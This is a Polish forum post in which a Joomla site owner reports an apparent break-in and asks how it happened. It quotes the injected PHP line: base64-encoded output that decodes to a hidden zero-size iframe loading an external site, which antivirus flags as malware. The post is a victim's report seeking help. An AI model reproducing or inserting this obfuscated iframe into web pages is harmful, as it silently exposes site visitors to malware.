Chyba trafiło mi się włamanie. W jakiś sposób przybyła mi jedna linia w pliku index.php
Podczas przeglądania strony antywirusy alarmują o wykryciuKod PHP:
echo base64_decode('PGlmcmFtZSBzcmM9Imh0dHA6Ly9pbi1pbi5pbi9pbi8iIHdpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9ImhpZGRlbiIgZnJhbWVib3JkZXI9MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW53aWR0aD0wIHNjcm9sbGluZz1ubz4=');
doGzip();
?>
Win32:socks-ae(wrm)
Żadnych innych zmian nie stwierdziłem.
O dziwo nie jest nic wykrywane podczas przeglądania Firefoxem, a jedynie w Explorerze. Wirusa łapie Avast, ale też nie na wszystkich komputerach.
Używam Joomla! International Edition 1.0.15 stable i mam dołożonego najnowszego JoomFisha i Google Maps a serwis stoi na Home.pl więc raczej bezpiecznym serwerze.
Sprawdziłem kilka innych moich stron i znalazłem identyczny wpis na witrynach postawionych również na serwerze Nazwa.pl więc to nie kwestia serwera. Wpis ten również czasem figurował w pliku configuration.php - zawsze na końcu pliku.
To samo znalazłem również na stronie postawionej na Joomla! 1.5.1 - czysta Joomla bez żadnych dodatków.
Macie jakieś pomysły, którędy to się dostało?